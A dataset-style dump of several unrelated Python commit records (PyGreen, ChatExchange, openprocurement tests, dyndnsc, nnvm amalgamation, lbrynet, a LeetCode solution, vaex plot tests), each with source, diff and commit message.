self.file_exclusion = [r".*\.mako", r"(^|.*\/)\..*"]
def base_lister():
files = []
for dirpath, dirnames, filenames in os.walk(self.folder):
for f in filenames:
absp = os.path.join(dirpath, f)
path = os.path.relpath(absp, self.folder)
good = True
for ex in self.file_exclusion:
if re.match(ex, path):
good = False
continue
if good:
files.append(path)
return files
        # A list of functions. Each function must return a list of paths
# of files to export during the generation of the static web site.
# The default one simply returns all the files contained in the folder.
# It is necessary to define new listers when new routes are defined
# in the Bottle application, or the static site generation routine
# will not be able to detect the files to export.
self.file_listers = [base_lister]
@self.app.route('/', method=['GET', 'POST', 'PUT', 'DELETE'])
@self.app.route('/<path:path>', method=['GET', 'POST', 'PUT', 'DELETE'])
def hello(path="index.html"):
if path.split(".")[-1] in self.template_exts:
t = self.templates.get_template(path)
data = t.render_unicode(pygreen=pygreen)
return data.encode(t.module._source_encoding)
return bottle.static_file(path, root=self.folder)
def set_folder(self, folder):
"""
Sets the folder where the files to serve are located.
"""
self.folder = folder
self.templates.directories[0] = folder
def run(self, **kwargs):
"""
Launch a development web server.
"""
kwargs.setdefault("host", "0.0.0.0")
bottle.run(self.app, **kwargs)
def get(self, path):
"""
        Get the content of a file, identified by its path relative to the folder configured
in PyGreen. If the file extension is one of the extensions that should be processed
through Mako, it will be processed.
"""
handler = wsgiref.handlers.SimpleHandler(sys.stdin, sys.stdout, sys.stderr, {})
handler.setup_environ()
env = handler.environ
env.update({'PATH_INFO': "/%s" % path, 'REQUEST_METHOD': "GET"})
out = b"".join(pygreen.app(env, lambda *args: None))
return out
def gen_static(self, output_folder):
"""
Generates a complete static version of the web site. It will stored in
output_folder.
"""
files = []
for l in self.file_listers:
files += l()
for f in files:
_logger.info("generating %s" % f)
content = self.get(f)
loc = os.path.join(output_folder, f)
d = os.path.dirname(loc)
if not os.path.exists(d):
os.makedirs(d)
with open(loc, "wb") as file_:
file_.write(content)
def cli(self, cmd_args=None):
"""
The command line interface of PyGreen.
"""
logging.basicConfig(level=logging.INFO, format='%(message)s')
parser = argparse.ArgumentParser(description='PyGreen, micro web framework/static web site generator')
subparsers = parser.add_subparsers(dest='action')
parser_serve = subparsers.add_parser('serve', help='serve the web site')
        parser_serve.add_argument('-p', '--port', type=int, default=8080, help='port on which to serve')
        parser_serve.add_argument('-f', '--folder', default=".", help='folder containing files to serve')
        parser_serve.add_argument('-d', '--disable-templates', action='store_true', default=False, help='just serve static files, do not invoke Mako')
def serve():
if args.disable_templates:
pygreen.template_exts = set([])
pygreen.run(port=args.port)
parser_serve.set_defaults(func=serve)
parser_gen = subparsers.add_parser('gen', help='generate a static version of the site')
parser_gen.add_argument('output', help='folder to store the files')
        parser_gen.add_argument('-f', '--folder', default=".", help='folder containing files to serve')
def gen():
pygreen.gen_static(args.output)
parser_gen.set_defaults(func=gen)
args = parser.parse_args(cmd_args)
pygreen.set_folder(args.folder)
args.func()
pygreen = PyGreen()
if __name__ == "__main__":
pygreen.cli()
|
Python
| 0.011905
|
@@ -6263,23 +6263,20 @@
-pygreen
+self
.templat
@@ -6304,23 +6304,20 @@
-pygreen
+self
.run(por
@@ -6681,23 +6681,20 @@
-pygreen
+self
.gen_sta
@@ -6804,23 +6804,20 @@
-pygreen
+self
.set_fol
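Decoded, all four hunks replace the module-level pygreen singleton with self inside cli() and its closures, so the command line interface operates on whichever instance it was called on. A sketch of the affected lines after the commit:
        def serve():
            if args.disable_templates:
                self.template_exts = set([])
            self.run(port=args.port)
        ...
        def gen():
            self.gen_static(args.output)
        ...
        args = parser.parse_args(cmd_args)
        self.set_folder(args.folder)
        args.func()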
|
53b156f83a792de1ebe42e93bb14f8dec005eada
|
Remove unused erroneous `import enum`.
|
chatexchange/wrapper.py
|
chatexchange/wrapper.py
|
import re
import time
import Queue
import threading
import logging
import logging.handlers
import BeautifulSoup
import enum
from . import browser, events
TOO_FAST_RE = r"You can perform this action again in (\d+) seconds"
logger = logging.getLogger(__name__)
class SEChatWrapper(object):
def __init__(self, site="SE"):
        self.logger = logger.getChild('SEChatWrapper')
if site == 'MSO':
self.logger.warn("'MSO' should no longer be used, use 'MSE' instead.")
site = 'MSE'
self.br = browser.SEChatBrowser()
self.site = site
self._previous = None
self.message_queue = Queue.Queue()
self.logged_in = False
self.messages = 0
self.thread = threading.Thread(target=self._worker, name="message_sender")
self.thread.setDaemon(True)
def login(self, username, password):
assert not self.logged_in
self.logger.info("Logging in.")
self.br.loginSEOpenID(username, password)
if self.site == "SE":
self.br.loginSECOM()
self.br.loginChatSE()
elif self.site == "SO":
self.br.loginSO()
elif self.site == "MSE":
self.br.loginMSE()
else:
raise ValueError("Unable to login to site: %r" % (self.site,))
self.logged_in = True
self.logger.info("Logged in.")
self.thread.start()
def logout(self):
assert self.logged_in
self.message_queue.put(SystemExit)
self.logger.info("Logged out.")
self.logged_in = False
def sendMessage(self, room_id, text):
self.message_queue.put((room_id, text))
self.logger.info("Queued message %r for room_id #%r.", text, room_id)
self.logger.info("Queue length: %d.", self.message_queue.qsize())
def __del__(self):
if self.logged_in:
self.message_queue.put(SystemExit)
# todo: underscore everything used by
# the thread so this is guaranteed
# to work.
assert False, "You forgot to log out."
def _worker(self):
assert self.logged_in
self.logger.info("Worker thread reporting for duty.")
while True:
next = self.message_queue.get() # blocking
if next == SystemExit:
self.logger.info("Worker thread exits.")
return
else:
self.messages += 1
room_id, text = next
self.logger.info(
"Now serving customer %d, %r for room #%s.",
self.messages, text, room_id)
self._actuallySendMessage(room_id, text) # also blocking.
self.message_queue.task_done()
# Appeasing the rate limiter gods is hard.
BACKOFF_MULTIPLIER = 2
BACKOFF_ADDER = 5
# When told to wait n seconds, wait n * BACKOFF_MULTIPLIER + BACKOFF_ADDER
def _actuallySendMessage(self, room_id, text):
room_id = str(room_id)
sent = False
attempt = 0
if text == self._previous:
text = " " + text
while not sent:
wait = 0
attempt += 1
self.logger.debug("Attempt %d: start.", attempt)
response = self.br.postSomething(
"/chats/"+room_id+"/messages/new",
{"text": text})
if isinstance(response, str):
match = re.match(TOO_FAST_RE, response)
if match: # Whoops, too fast.
wait = int(match.group(1))
self.logger.debug(
"Attempt %d: denied: throttled, must wait %.1f seconds",
attempt, wait)
# Wait more than that, though.
wait *= self.BACKOFF_MULTIPLIER
wait += self.BACKOFF_ADDER
else: # Something went wrong. I guess that happens.
wait = self.BACKOFF_ADDER
logging.error(
"Attempt %d: denied: unknown reason %r",
attempt, response)
elif isinstance(response, dict):
if response["id"] is None: # Duplicate message?
text = text + " " # Append because markdown
wait = self.BACKOFF_ADDER
self.logger.debug(
"Attempt %d: denied: duplicate, waiting %.1f seconds.",
attempt, wait)
if wait:
self.logger.debug("Attempt %d: waiting %.1f seconds", attempt, wait)
else:
wait = self.BACKOFF_ADDER
self.logger.debug("Attempt %d: success. Waiting %.1f seconds", attempt, wait)
sent = True
self._previous = text
time.sleep(wait)
def joinRoom(self, room_id):
self.br.joinRoom(room_id)
def _room_events(self, activity, room_id):
"""
Returns a list of Events associated with a particular room,
given an activity message from the server.
"""
room_activity = activity.get('r' + room_id, {})
room_events_data = room_activity.get('e', [])
room_events = [
events.make(data, self) for data in room_events_data if data]
return room_events
def watchRoom(self, room_id, on_event, interval):
def on_activity(activity):
for event in self._room_events(activity, room_id):
on_event(event, self)
self.br.watch_room_http(room_id, on_activity, interval)
def watchRoomSocket(self, room_id, on_event):
def on_activity(activity):
for event in self._room_events(activity, room_id):
on_event(event, self)
self.br.watch_room_socket(room_id, on_activity)
|
Python
| 0
|
@@ -109,20 +109,8 @@
Soup
-%0Aimport enum
%0A%0Afr
|
e51786c46ad4eb7310b1eaa0153253116f2c01bc
|
Update test bids
|
openprocurement/tender/esco/tests/base.py
|
openprocurement/tender/esco/tests/base.py
|
# -*- coding: utf-8 -*-
import os
from copy import deepcopy
from openprocurement.tender.openeu.tests.base import (
BaseTenderWebTest,
test_features_tender_data as base_eu_test_features_data,
test_tender_data as base_eu_test_data,
test_lots as base_eu_lots,
test_bids as base_eu_bids,
)
test_tender_data = deepcopy(base_eu_test_data)
test_tender_data['procurementMethodType'] = "esco.EU"
test_tender_data['NBUdiscountRate'] = 0.22
test_tender_data['minValue'] = test_tender_data['value']
del test_tender_data['value']
test_features_tender_data = deepcopy(base_eu_test_features_data)
test_features_tender_data['procurementMethodType'] = "esco.EU"
test_features_tender_data['NBUdiscountRate'] = 0.22
test_features_tender_data['minValue'] = test_features_tender_data['value']
del test_features_tender_data['value']
test_lots = deepcopy(base_eu_lots)
test_lots[0]['minValue'] = test_lots[0]['value']
del test_lots[0]['value']
test_bids = deepcopy(base_eu_bids)
test_bids[0]['value'] = {'yearlyPayments': 0.9,
'annualCostsReduction': 751.5,
'contractDuration': 10}
class BaseESCOWebTest(BaseTenderWebTest):
relative_to = os.path.dirname(__file__)
initial_data = None
initial_status = None
initial_bids = None
initial_lots = None
initial_auth = ('Basic', ('broker', ''))
docservice = False
class BaseESCOContentWebTest(BaseESCOWebTest):
""" ESCO Content Test """
initialize_initial_data = True
def setUp(self):
super(BaseESCOContentWebTest, self).setUp()
if self.initial_data and self.initialize_initial_data:
self.create_tender()
class BaseESCOEUContentWebTest(BaseESCOContentWebTest):
""" ESCO EU Content Test """
initial_data = test_tender_data
|
Python
| 0
|
@@ -981,20 +981,37 @@
ds)%0A
-test_bids%5B0%5D
+for bid in test_bids:%0A bid
%5B'va
@@ -1065,18 +1065,16 @@
-
'annualC
@@ -1096,18 +1096,16 @@
751.5,%0A
-
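Decoded, the hunks turn the single-bid assignment into a loop over every test bid, re-indenting the dict to match:
test_bids = deepcopy(base_eu_bids)
for bid in test_bids:
    bid['value'] = {'yearlyPayments': 0.9,
                    'annualCostsReduction': 751.5,
                    'contractDuration': 10}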
|
7a8e5d15d7d9681b8d5ddae4d72e64b5ca6cba13
|
remove disabled code
|
dyndnsc/updater/base.py
|
dyndnsc/updater/base.py
|
# -*- coding: utf-8 -*-
import logging
import requests
from ..common.subject import Subject
from ..common.events import IP_UPDATE_SUCCESS, IP_UPDATE_ERROR
log = logging.getLogger(__name__)
class UpdateProtocol(Subject):
"""the base class for all update protocols"""
_updateurl = None
theip = None
hostname = None # this holds the desired dns hostname
status = 0
nochgcount = 0
failcount = 0
def __init__(self):
self.updateurl = self._updateurl
super(UpdateProtocol, self).__init__()
observers = []
# TODO: auto detect all notifiers
# TODO: make this configurable?
if False:
from ..notifications import osxnotificationcenter
if osxnotificationcenter.is_available():
observers.append(osxnotificationcenter.create_notify_handler())
from ..notifications import growl
if growl.is_available():
observers.append(growl.create_notify_handler())
for observer in observers:
self.register_observer(observer, (IP_UPDATE_SUCCESS, IP_UPDATE_ERROR))
def updateUrl(self):
return self.updateurl
def success(self):
self.status = 0
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_SUCCESS, "Updated IP address of '%s' to %s" % (self.hostname, self.theip))
def abuse(self):
self.status = 1
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_ERROR, "This client is considered to be abusive for hostname '%s'" % (self.hostname))
def nochg(self):
self.status = 0
self.failcount = 0
self.nochgcount += 1
def nohost(self):
self.status = 1
self.failcount += 1
        self.notify_observers(IP_UPDATE_ERROR, "Invalid/non-existent hostname: [%s]" % (self.hostname))
def failure(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Service is failing")
def notfqdn(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "The provided hostname '%s' is not a valid hostname!" % (self.hostname))
def protocol(self):
params = {'myip': self.theip, 'hostname': self.hostname}
r = requests.get(self.updateUrl(), params=params, auth=(self.userid, self.password), timeout=60)
r.close()
log.debug("status %i, %s", r.status_code, r.text)
if r.status_code == 200:
if r.text.startswith("good "):
self.success()
return self.theip
elif r.text.startswith('nochg'):
self.nochg()
return self.theip
elif r.text == 'nohost':
self.nohost()
return 'nohost'
elif r.text == 'abuse':
self.abuse()
return 'abuse'
elif r.text == '911':
self.failure()
return '911'
elif r.text == 'notfqdn':
self.notfqdn()
return 'notfqdn'
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.text))
return r.text
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.status_code))
return 'invalid http status code: %s' % r.status_code
|
Python
| 0
|
@@ -538,594 +538,8 @@
()%0A%0A
- observers = %5B%5D%0A%0A # TODO: auto detect all notifiers%0A # TODO: make this configurable?%0A if False:%0A from ..notifications import osxnotificationcenter%0A if osxnotificationcenter.is_available():%0A observers.append(osxnotificationcenter.create_notify_handler())%0A from ..notifications import growl%0A if growl.is_available():%0A observers.append(growl.create_notify_handler())%0A%0A for observer in observers:%0A self.register_observer(observer, (IP_UPDATE_SUCCESS, IP_UPDATE_ERROR))%0A%0A
|
6c15caa37c3635fc1ca65a0d2989a271bc5723fe
|
Update amalgamation.py
|
nnvm/amalgamation/amalgamation.py
|
nnvm/amalgamation/amalgamation.py
|
import sys
import os.path, re, StringIO
blacklist = [
'Windows.h',
'mach/clock.h', 'mach/mach.h',
'malloc.h',
'glog/logging.h', 'io/azure_filesys.h', 'io/hdfs_filesys.h', 'io/s3_filesys.h',
'sys/stat.h', 'sys/types.h',
'omp.h'
]
def get_sources(def_file):
sources = []
files = []
visited = set()
mxnet_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
for line in open(def_file):
files = files + line.strip().split(' ')
for f in files:
f = f.strip()
if not f or f.endswith('.o:') or f == '\\': continue
fn = os.path.relpath(f)
if os.path.abspath(f).startswith(mxnet_path) and fn not in visited:
sources.append(fn)
visited.add(fn)
return sources
sources = get_sources(sys.argv[1])
def find_source(name, start):
candidates = []
for x in sources:
if x == name or x.endswith('/' + name): candidates.append(x)
if not candidates: return ''
if len(candidates) == 1: return candidates[0]
for x in candidates:
if x.split('/')[1] == start.split('/')[1]: return x
return ''
re1 = re.compile('<([./a-zA-Z0-9_-]*)>')
re2 = re.compile('"([./a-zA-Z0-9_-]*)"')
sysheaders = []
history = set([])
out = StringIO.StringIO()
def expand(x, pending):
if x in history and x not in ['mshadow/mshadow/expr_scalar-inl.h']: # MULTIPLE includes
return
if x in pending:
#print 'loop found: %s in ' % x, pending
return
print >>out, "//===== EXPANDING: %s =====\n" %x
for line in open(x):
if line.find('#include') < 0:
out.write(line)
continue
if line.strip().find('#include') > 0:
print line
continue
m = re1.search(line)
if not m: m = re2.search(line)
if not m:
print line + ' not found'
continue
h = m.groups()[0].strip('./')
source = find_source(h, x)
if not source:
if (h not in blacklist and
h not in sysheaders and
'mkl' not in h and
'nnpack' not in h): sysheaders.append(h)
else:
expand(source, pending + [x])
print >>out, "//===== EXPANDED: %s =====\n" %x
history.add(x)
expand(sys.argv[2], [])
f = open(sys.argv[3], 'wb')
for k in sorted(sysheaders):
print >>f, "#include <%s>" % k
print >>f, ''
print >>f, out.getvalue()
for x in sources:
if x not in history and not x.endswith('.o'):
print 'Not processed:', x
|
Python
| 0.000001
|
@@ -244,16 +244,50 @@
'omp.h'
+, 'execinfo.h', 'packet/sse-inl.h'
%0A %5D%0A%0A
|
7fabbbb6562f068690b7971c6ea1299172400d73
|
fix `make run_importer_jobs`
|
labonneboite/importer/conf/development.py
|
labonneboite/importer/conf/development.py
|
# --- job 1/8 & 2/8 : check_etablissements & extract_etablissements
DISTINCT_DEPARTEMENTS_HAVING_OFFICES = 15
# --- job 5/8 : compute_scores
MINIMUM_OFFICES_REQUIRED_TO_TRAIN_MODEL = 0
RMSE_MAX = 5000
MAXIMUM_COMPUTE_SCORE_JOB_FAILURES = 94 # 96 departements == 2 successes + 94 failures
# --- job 6/8 : validate_scores
SCORE_REDUCING_MINIMUM_THRESHOLD = 0
DEPARTEMENTS_TO_BE_SANITY_CHECKED = ['14', '69']
|
Python
| 0
|
@@ -190,17 +190,18 @@
E_MAX =
-5
+20
000%0AMAXI
|
51129edea0a10a5799f329443b196e930a591fb9
|
Move down timezone module.
|
laundryapp/templatetags/laundryapptags.py
|
laundryapp/templatetags/laundryapptags.py
|
from schedule.conf.settings import CHECK_EVENT_PERM_FUNC, CHECK_CALENDAR_PERM_FUNC
from schedule.templatetags.scheduletags import querystring_for_date
from django.conf import settings
from django import template
from django.core.urlresolvers import reverse
from django.utils import timezone
from django.utils.safestring import mark_safe
from schedule.conf.settings import SCHEDULER_PREVNEXT_LIMIT_SECONDS
register = template.Library()
from pytz import timezone
import datetime
import sys
@register.inclusion_tag("schedule/_daily_table.html", takes_context=True)
def laundryapp_daily_table(context, day, start=6, end=23, increment=60):
user = context['request'].user
addable = CHECK_EVENT_PERM_FUNC(None, user)
if 'calendar' in context:
addable &= CHECK_CALENDAR_PERM_FUNC(context['calendar'], user)
context['addable'] = addable
day_part = day.get_time_slot(day.start + datetime.timedelta(hours=start), day.start + datetime.timedelta(hours=end))
# get slots to display on the left
slots = _cook_slots(day_part, increment)
context['slots'] = slots
return context
def _cook_slots(period, increment):
"""
    Prepare slots to be displayed on the left hand side;
    calculate dimensions (in px) for each slot.
Arguments:
period - time period for the whole series
increment - slot size in minutes
"""
tdiff = datetime.timedelta(minutes=increment)
num = int((period.end - period.start).total_seconds()) // int(tdiff.total_seconds())
s = period.start
slots = []
for i in range(num):
sl = period.get_time_slot(s, s + tdiff)
slots.append(sl)
s = s + tdiff
return slots
@register.inclusion_tag("schedule/_create_event_options.html", takes_context=True)
def laundryapp_create_event_url(context, calendar, slot):
print >> sys.stderr, "In laundryapp templatetags!"
context.update({
'calendar': calendar,
'MEDIA_URL': getattr(settings, "MEDIA_URL"),
})
lookup_context = {
'calendar_slug': calendar.slug,
}
settings_timezone = timezone(settings.TIME_ZONE)
slot = slot.astimezone(settings_timezone)
context['laundryapp_create_event_url'] = "%s%s" % (
reverse("calendar_create_event", kwargs=lookup_context),
querystring_for_date(slot))
return context
@register.simple_tag
def prev_url(target, calendar, period):
now = timezone.now()
delta = now - period.prev().start
slug = calendar.slug
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-left"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.prev().start)))
@register.simple_tag
def next_url(target, calendar, period):
now = timezone.now()
slug = calendar.slug
delta = period.next().start - now
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-right"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.next().start)))
|
Python
| 0
|
@@ -256,42 +256,8 @@
rse%0A
-from django.utils import timezone%0A
from
@@ -399,16 +399,50 @@
rary()%0A%0A
+from django.utils import timezone%0A
from pyt
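Decoded, the commit only moves `from django.utils import timezone` down to sit with `register = template.Library()`, immediately before `from pytz import timezone`. Note that in either ordering the pytz import rebinds the name timezone, so timezone.now() in prev_url/next_url resolves to pytz's timezone() function, not Django's module. A sketch of one way to keep both usable; the alias is a suggestion, not part of the commit:
from django.utils import timezone
from pytz import timezone as pytz_timezone  # avoid shadowing django.utils.timezone
# in laundryapp_create_event_url:
settings_timezone = pytz_timezone(settings.TIME_ZONE)
# in prev_url / next_url:
now = timezone.now()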
|
d7bfeae6b8346efa49c00dd19395e20a3e28404c
|
fix position of stream terminator blob
|
lbrynet/cryptstream/CryptStreamCreator.py
|
lbrynet/cryptstream/CryptStreamCreator.py
|
"""
Utility for creating Crypt Streams, which are encrypted blobs and associated metadata.
"""
import logging
from twisted.internet import interfaces, defer
from zope.interface import implements
from Crypto import Random
from Crypto.Cipher import AES
from lbrynet.cryptstream.CryptBlob import CryptStreamBlobMaker
log = logging.getLogger(__name__)
class CryptStreamCreator(object):
"""
Create a new stream with blobs encrypted by a symmetric cipher.
Each blob is encrypted with the same key, but each blob has its
own initialization vector which is associated with the blob when
the blob is associated with the stream.
"""
implements(interfaces.IConsumer)
def __init__(self, blob_manager, name=None, key=None, iv_generator=None):
"""@param blob_manager: Object that stores and provides access to blobs.
@type blob_manager: BlobManager
@param name: the name of the stream, which will be presented to the user
@type name: string
@param key: the raw AES key which will be used to encrypt the
blobs. If None, a random key will be generated.
@type key: string
@param iv_generator: a generator which yields initialization
vectors for the blobs. Will be called once for each blob.
@type iv_generator: a generator function which yields strings
@return: None
"""
self.blob_manager = blob_manager
self.name = name
self.key = key
if iv_generator is None:
self.iv_generator = self.random_iv_generator()
else:
self.iv_generator = iv_generator
self.stopped = True
self.producer = None
self.streaming = None
self.blob_count = -1
self.current_blob = None
self.finished_deferreds = []
def registerProducer(self, producer, streaming):
from twisted.internet import reactor
self.producer = producer
self.streaming = streaming
self.stopped = False
if streaming is False:
reactor.callLater(0, self.producer.resumeProducing)
def unregisterProducer(self):
self.stopped = True
self.producer = None
def _close_current_blob(self):
# close the blob that was being written to
# and save it to blob manager
should_announce = self.blob_count == 0
d = self.current_blob.close()
d.addCallback(self._blob_finished)
d.addCallback(lambda blob_info: self.blob_manager.creator_finished(blob_info,
should_announce))
self.finished_deferreds.append(d)
self.current_blob = None
def stop(self):
"""Stop creating the stream. Create the terminating zero-length blob."""
log.debug("stop has been called for StreamCreator")
self.stopped = True
if self.current_blob is not None:
self._close_current_blob()
self._finalize()
dl = defer.DeferredList(self.finished_deferreds)
dl.addCallback(lambda _: self._finished())
return dl
# TODO: move the stream creation process to its own thread and
# remove the reactor from this process.
def write(self, data):
from twisted.internet import reactor
self._write(data)
if self.stopped is False and self.streaming is False:
reactor.callLater(0, self.producer.resumeProducing)
@staticmethod
def random_iv_generator():
while 1:
yield Random.new().read(AES.block_size)
def setup(self):
"""Create the symmetric key if it wasn't provided"""
if self.key is None:
self.key = Random.new().read(AES.block_size)
return defer.succeed(True)
def _finalize(self):
"""
Finalize a stream by adding an empty
        blob at the end; this indicates that
        the stream has ended. This empty blob is not
        saved to the blob manager.
"""
log.debug("_finalize has been called")
self.blob_count += 1
iv = self.iv_generator.next()
final_blob_creator = self.blob_manager.get_blob_creator()
final_blob = self._get_blob_maker(iv, final_blob_creator)
d = final_blob.close()
d.addCallback(self._blob_finished)
self.finished_deferreds.append(d)
def _write(self, data):
while len(data) > 0:
if self.current_blob is None:
self.next_blob_creator = self.blob_manager.get_blob_creator()
self.blob_count += 1
iv = self.iv_generator.next()
self.current_blob = self._get_blob_maker(iv, self.next_blob_creator)
done, num_bytes_written = self.current_blob.write(data)
data = data[num_bytes_written:]
if done is True:
self._close_current_blob()
def _get_blob_maker(self, iv, blob_creator):
return CryptStreamBlobMaker(self.key, iv, self.blob_count, blob_creator)
def _finished(self):
raise NotImplementedError()
def _blob_finished(self, blob_info):
raise NotImplementedError()
|
Python
| 0.000003
|
@@ -2979,24 +2979,28 @@
ob()%0A
+ d =
self._final
@@ -3018,66 +3018,8 @@
d
-l = defer.DeferredList(self.finished_deferreds)%0A dl
.add
@@ -3071,17 +3071,16 @@
return d
-l
%0A%0A #
@@ -3736,24 +3736,51 @@
ceed(True)%0A%0A
+ @defer.inlineCallbacks%0A
def _fin
@@ -3994,32 +3994,33 @@
%22%22%22%0A
+%0A
log.debug(%22_
@@ -4011,45 +4011,56 @@
-log.debug(%22_finalize has been called%22
+yield defer.DeferredList(self.finished_deferreds
)%0A
@@ -4138,34 +4138,51 @@
final_blob
-_creator =
+ = self._get_blob_maker(iv,
self.blob_m
@@ -4198,32 +4198,33 @@
t_blob_creator()
+)
%0A final_b
@@ -4220,180 +4220,165 @@
-final_blob = self._get_blob_maker(iv, final_blob_creator)%0A d = final_blob.close()%0A d.addCallback(self._blob_finished)%0A self.finished_
+stream_terminator = yield final_blob.close()%0A terminator_info = yield self._blob_finished(stream_terminator)%0A
defer
+.
re
-ds.append(d
+turnValue(terminator_info
)%0A%0A
|
827c11e1ac31bdbf0c853350464a2a4d55a82124
|
Add comments
|
lc0121_best_time_to_buy_and_sell_stock.py
|
lc0121_best_time_to_buy_and_sell_stock.py
|
"""Leetcode 121. Best Time to Buy and Sell Stock
Easy
URL: https://leetcode.com/problems/best-time-to-buy-and-sell-stock/
Say you have an array for which the ith element is the price of a given stock on day i.
If you were only permitted to complete at most one transaction
(i.e., buy one and sell one share of the stock),
design an algorithm to find the maximum profit.
Note that you cannot sell a stock before you buy one.
Example 1:
Input: [7,1,5,3,6,4]
Output: 5
Explanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = 6-1 = 5.
Not 7-1 = 6, as selling price needs to be larger than buying price.
Example 2:
Input: [7,6,4,3,1]
Output: 0
Explanation: In this case, no transaction is done, i.e. max profit = 0.
"""
class SolutionNaive(object):
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
Note: Time limit exceeded.
Time complexity: O(n^2), where n is the number of prices.
Space complexity: O(1).
"""
if not prices:
return 0
profit = 0
n = len(prices)
for i in range(n - 1):
for j in range(i + 1, n):
if prices[j] - prices[i] > profit:
profit = prices[j] - prices[i]
return profit
class SolutionDivideAndConquer(object):
def _divideAndConquer(self, prices, i, j):
if i == j:
            # Only one day, so we cannot buy and then sell.
return 0
mid = i + (j - i) // 2
# Compute profits in left and right subarrays.
left_profit = self._divideAndConquer(prices, i, mid)
right_profit = self._divideAndConquer(prices, mid + 1, j)
        # Compute the cross profit: buy at the left-half minimum, sell at the right-half maximum.
left_min = prices[i]
for l in range(i + 1, mid + 1):
if prices[l] < left_min:
left_min = prices[l]
right_max = prices[mid + 1]
for r in range(mid + 2, j + 1):
if prices[r] > right_max:
right_max = prices[r]
cross_profit = max(0, right_max - left_min)
return max(left_profit, right_profit, cross_profit)
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
Time complexity: O(n*logn), where n is the number of prices.
Space complexity: O(1).
"""
if not prices:
return 0
left, right = 0, len(prices) - 1
return self._divideAndConquer(prices, left, right)
class SolutionIter(object):
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
Time complexity: O(n), where n is the number of prices.
Space complexity: O(1).
"""
if not prices:
return 0
        minimum = prices[0]
profit = 0
for i in range(1, len(prices)):
current = prices[i]
# Update the latest max profit.
            cur_profit = current - minimum
profit = max(cur_profit, profit)
# Update the latest minimum.
            minimum = min(current, minimum)
return profit
def main():
import time
# Ans: 5
prices = [7,1,5,3,6,4]
start_time = time.time()
print 'By naive:', SolutionNaive().maxProfit(prices)
print 'Time:', time.time() - start_time
start_time = time.time()
print 'By divide-and-conquer:', SolutionDivideAndConquer().maxProfit(prices)
print 'Time:', time.time() - start_time
start_time = time.time()
print 'By iter:', SolutionIter().maxProfit(prices)
print 'Time:', time.time() - start_time
# Ans: 6
prices = [6,1,3,2,4,7]
start_time = time.time()
print 'By naive:', SolutionNaive().maxProfit(prices)
print 'Time:', time.time() - start_time
start_time = time.time()
print 'By divide-and-conquer:', SolutionDivideAndConquer().maxProfit(prices)
print 'Time:', time.time() - start_time
start_time = time.time()
print 'By iter:', SolutionIter().maxProfit(prices)
print 'Time:', time.time() - start_time
if __name__ == '__main__':
main()
|
Python
| 0
|
@@ -2845,32 +2845,90 @@
return 0%0A
+ %0A # Continue tracking minimum price and profit.
 %0A minimum
|
3a80367a61ddf958dc62d8082bc4e463709cbdef
|
Test bad value colors
|
vaex/test/plot.py
|
vaex/test/plot.py
|
__author__ = 'maartenbreddels'
import unittest
import os
import tempfile
import logging
import shutil
import numpy as np
import PIL.Image
import PIL.ImageChops
import pylab as plt
import vaex as vx
import vaex.utils
try:
raw_input = input
except:
pass # py2/3 fix
base_path = os.path.dirname(__file__)
def get_comparison_image(name):
osname = vaex.utils.osname
return os.path.join(base_path, "images", name+"_" + osname + ".png")
overwrite_images = False
class check_output(object):
def __init__(self, name):
self.name = name
self.fn = get_comparison_image(name)
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
plt.close()
return
fn = tempfile.mktemp(".png")
plt.savefig(fn)
if not os.path.exists(self.fn):
print("comparison image did not exist, copying to %s" % self.fn)
shutil.copy(fn, self.fn)
image1 = PIL.Image.open(self.fn)
image2 = PIL.Image.open(fn)
diff = PIL.ImageChops.difference(image1, image2)
extrema = diff.getextrema()
for i, (vmin, vmax) in enumerate(extrema):
msg = "difference found between {im1} and {im2} in band {band}\n $ cp {im1} {im2}".format(im1=self.fn, im2=fn,
band=i)
if vmin != vmax and overwrite_images:
image1.show()
image2.show()
done = False
while not done:
answer = raw_input("is the new image ok? [y/N]").lower().strip()
if answer == "n":
                        assert vmin == 0, msg  # plain assert: check_output is not a TestCase
return
if answer == "y":
shutil.copy(fn, self.fn)
return
assert vmin == 0, msg
assert vmax == 0, msg
plt.close()
class TestPlot(unittest.TestCase):
def setUp(self):
self.dataset = vx.example()
def tearDown(self):
if vx.utils.osname != "osx":
self.dataset.close_files()
def test_single(self):
with check_output("single_xy"):
self.dataset.plot("x", "y", title="face on")
def test_multiplot(self):
with check_output("multiplot_xy"):
self.dataset.plot([["x", "y"], ["x", "z"]], title="Face on and edge on", figsize=(10, 4));
def test_multistat(self):
with check_output("multistat"):
self.dataset.plot("x", "y", what=["count(*)", "mean(vx)", "correlation(vy, vz)"], title="Different statistics", figsize=(10,5));
def test_multiplot_multiwhat(self):
with check_output("multiplot_multiwhat"):
self.dataset.plot([["x", "y"], ["x", "z"], ["y", "z"]],
what=["count(*)", "mean(vx)", "correlation(vx, vy)", "correlation(vx, vz)"],
title="Different statistics and plots", figsize=(14, 12));
def test_multistat_multiwhat_swapped(self):
with check_output("multistat_multiwhat_swapped"):
self.dataset.plot([["x", "y"], ["x", "z"], ["y", "z"]],
